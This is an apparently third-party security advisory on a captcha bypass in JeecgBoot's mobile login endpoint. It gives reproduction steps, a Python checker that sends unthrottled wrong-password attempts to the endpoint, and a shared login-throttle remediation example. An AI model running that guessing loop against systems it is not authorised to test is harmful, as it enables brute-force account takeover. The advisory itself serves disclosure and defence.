JeecgBoot Authorization Bypass Vulnerability in Mobile Login Endpoint

Vulnerability

A captcha bypass, classed on this page as an authorization bypass, has been identified in JeecgBoot version 3.9.1 in the mobile login endpoint. In LoginController.java the mLogin endpoint accepts a username and password without performing the captcha check that the standard login endpoint enforces, so credentials can be tested against it freely. The flaw is reachable remotely without prior authentication and has been publicly disclosed, so exploitation in the wild is plausible. The source rates the attack complexity as high; note, however, that the reproduction below needs nothing more than an ordinary POST request carrying candidate credentials.

Impact

The vulnerability permits unthrottled password guessing (brute force and credential stuffing) against user accounts through the mobile login endpoint, without the captcha friction the standard endpoint imposes. Combined with the absence of rate limiting and account lockout noted in the reproduction, this can lead to rapid account takeover, especially for accounts with weak or reused passwords.

Reproduction

To reproduce, first confirm that the standard login endpoint enforces the captcha: send a POST request carrying a valid username and password but no captcha value, and observe that the response rejects the attempt because the captcha is invalid. Then send a POST request with the same credentials, again without a captcha, to the mobile login endpoint (mLogin). This time the response reports a successful login, showing that the captcha check has been bypassed. Finally, test for rate limiting and account lockout by repeatedly submitting wrong passwords for the same account through the mobile endpoint; in the affected version none of the attempts is blocked or delayed.
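The three checks above as a small Python script. This is an added example for this page, not JeecgBoot's own code or the original reporter's proof of concept. The endpoint paths (/sys/login and /sys/mLogin), the JSON response envelope (success, message, result.token), the JSON request body and the captcha error wording are assumptions about a stock 3.9.x deployment; adjust them to what your target actually returns. The transport is injected so the script runs offline against a constructed stand-in that mirrors the behaviour described on the page, and can be pointed at an instance you are authorised to test by swapping in http_post.

```python
"""Checker for the captcha gap between JeecgBoot's standard and mobile login
endpoints. Added example for this page, not JeecgBoot's own code. The paths
(/sys/login, /sys/mLogin), the JSON envelope (success, message, result.token)
and the captcha error wording are assumptions about a stock 3.9.x install;
adjust them to what your target actually returns."""
import json
import urllib.request
from typing import Callable, Dict, Tuple

STANDARD_LOGIN = "/sys/login"   # assumed path of LoginController.login
MOBILE_LOGIN = "/sys/mLogin"    # assumed path of LoginController.mLogin

# A transport: (path, JSON form) -> parsed JSON response body.
Post = Callable[[str, Dict[str, str]], dict]


def classify(body: dict) -> str:
    """Map a login response to login_ok / captcha_rejected / blocked / auth_failed.
    Assumes JeecgBoot's Result envelope and that captcha failures mention
    '验证码' (captcha); lockout messages are matched on a few common words."""
    result = body.get("result")
    if body.get("success") and isinstance(result, dict) and "token" in result:
        return "login_ok"
    message = str(body.get("message", "")).lower()
    if "验证码" in message or "captcha" in message:
        return "captcha_rejected"
    if any(w in message for w in ("锁定", "locked", "too many", "频繁")):
        return "blocked"
    return "auth_failed"


def check_captcha_gap(post: Post, username: str, password: str) -> Tuple[str, str]:
    """Steps 1 and 2: same credentials, no captcha fields, to both endpoints.
    Expected on an affected install: ('captcha_rejected', 'login_ok')."""
    creds = {"username": username, "password": password}
    return classify(post(STANDARD_LOGIN, creds)), classify(post(MOBILE_LOGIN, creds))


def probe_throttling(post: Post, username: str, attempts: int) -> int:
    """Step 3: send `attempts` wrong passwords to the mobile endpoint and count
    how many are refused as blocked. Zero means no lockout or rate limit."""
    blocked = 0
    for i in range(attempts):
        body = post(MOBILE_LOGIN, {"username": username, "password": f"wrong-{i}"})
        if classify(body) == "blocked":
            blocked += 1
    return blocked


def http_post(base_url: str) -> Post:
    """Real transport, for an instance you are authorised to test. Assumes the
    endpoints bind a JSON request body (an assumption about LoginController)."""
    def post(path: str, form: Dict[str, str]) -> dict:
        req = urllib.request.Request(base_url + path, data=json.dumps(form).encode(),
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read().decode())
    return post


def simulated_post(path: str, form: Dict[str, str]) -> dict:
    """Constructed offline stand-in reproducing the behaviour the page describes:
    /sys/login refuses without a captcha, /sys/mLogin only checks the password
    and never throttles. Replace with http_post(...) for a live check."""
    if path == STANDARD_LOGIN:
        return {"success": False, "code": 500, "message": "验证码无效", "result": None}
    if form.get("username") == "admin" and form.get("password") == "correct-pw":
        return {"success": True, "code": 200, "message": "登录成功",
                "result": {"token": "constructed-token"}}
    return {"success": False, "code": 500, "message": "用户名或密码错误", "result": None}


if __name__ == "__main__":
    post = simulated_post  # e.g. http_post("http://127.0.0.1:8080/jeecg-boot")
    print("standard vs mobile:", check_captcha_gap(post, "admin", "correct-pw"))
    print("blocked attempts out of 50:", probe_throttling(post, "admin", 50))
```

On an affected instance the first call returns ('captcha_rejected', 'login_ok') and the second returns 0; a patched instance should return 'captcha_rejected' for both endpoints and a non-zero blocked count once the lockout threshold is crossed. Keep the classification rules loose, since the exact message strings depend on the deployment's locale and version.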

Remediation

To address this vulnerability: add the same captcha verification to the mobile login endpoint that the standard endpoint already performs; add rate limiting and account lockout, keeping the counters shared across every login endpoint so that an attacker cannot sidestep the limit by switching endpoints; and consider restricting who may call the mobile endpoint, for example through an API key or app signature check. Note that a key or signature embedded in a mobile app can be extracted from the app, so that control raises the bar but does not replace the captcha and throttling.
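An illustration of the shared-throttle point, written as an added example for this page; it is not JeecgBoot's code, and the thresholds, the 300-second window and the lockout duration are assumptions. Both login handlers call the same throttle before and after the password check, so failures generated through the mobile endpoint lock the account for the standard endpoint as well, and a burst of failures from one source address is refused regardless of which usernames it tries.

```python
"""Shared login throttle: one instance consulted by every login endpoint.
Added example for this page, not JeecgBoot code; thresholds are assumptions."""
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, Optional


class LoginThrottle:
    def __init__(self, max_failures: int = 5, window: float = 300.0,
                 lockout: float = 900.0, ip_limit: int = 50):
        self.max_failures = max_failures  # failures per account before lockout
        self.window = window              # seconds over which failures are counted
        self.lockout = lockout            # seconds an account stays locked
        self.ip_limit = ip_limit          # failures per source address per window
        self._account_failures: Dict[str, Deque[float]] = defaultdict(deque)
        self._ip_failures: Dict[str, Deque[float]] = defaultdict(deque)
        self._locked_until: Dict[str, float] = {}

    def _prune(self, q: Deque[float], now: float) -> None:
        """Drop timestamps that have aged out of the sliding window."""
        while q and now - q[0] > self.window:
            q.popleft()

    def check(self, username: str, ip: str, now: Optional[float] = None) -> Optional[str]:
        """Return None if the attempt may proceed, otherwise the refusal reason.
        Call this before verifying the password, on every login endpoint."""
        now = time.time() if now is None else now
        until = self._locked_until.get(username)
        if until is not None:
            if now < until:
                return "account_locked"
            del self._locked_until[username]   # lockout has expired
        ipq = self._ip_failures[ip]
        self._prune(ipq, now)
        if len(ipq) >= self.ip_limit:
            return "source_rate_limited"
        return None

    def record(self, username: str, ip: str, success: bool,
               now: Optional[float] = None) -> None:
        """Call after the password check; a success clears the account's failures."""
        now = time.time() if now is None else now
        if success:
            self._account_failures.pop(username, None)
            return
        q = self._account_failures[username]
        self._prune(q, now)
        q.append(now)
        self._ip_failures[ip].append(now)
        if len(q) >= self.max_failures:
            self._locked_until[username] = now + self.lockout
            q.clear()


def login_attempt(throttle: LoginThrottle, username: str, password: str, ip: str,
                  verify: Callable[[str, str], bool], now: Optional[float] = None) -> str:
    """Common wrapper that both the standard and the mobile handler should use
    once their own captcha check has passed. `verify` is the password check,
    injected here so the example runs without a user store."""
    refusal = throttle.check(username, ip, now)
    if refusal:
        return refusal
    ok = verify(username, password)
    throttle.record(username, ip, ok, now)
    return "login_ok" if ok else "auth_failed"


if __name__ == "__main__":
    throttle = LoginThrottle(max_failures=3, window=60, lockout=120)
    verify = lambda u, p: (u, p) == ("alice", "right")  # constructed user store
    # Three wrong guesses via the mobile path lock the account ...
    for guess in ("a", "b", "c"):
        print("mobile:", login_attempt(throttle, "alice", guess, "10.0.0.1", verify))
    # ... and the standard path refuses even the correct password.
    print("standard:", login_attempt(throttle, "alice", "right", "10.0.0.1", verify))
```

Lockout is a double-edged control: an attacker who knows a username can lock its legitimate owner out on purpose, so in practice pair a modest per-account threshold with progressive delays and the source-address limit rather than relying on lockout alone.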

Added: May 9, 2026, 9:18 PM
Updated: May 9, 2026, 9:18 PM

Vulnerability Rating

Custom Algorithm
spread: 0.8
impact: 1.3
exploitability: 9.5
remediation: 7.7
relevance: 7.8
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.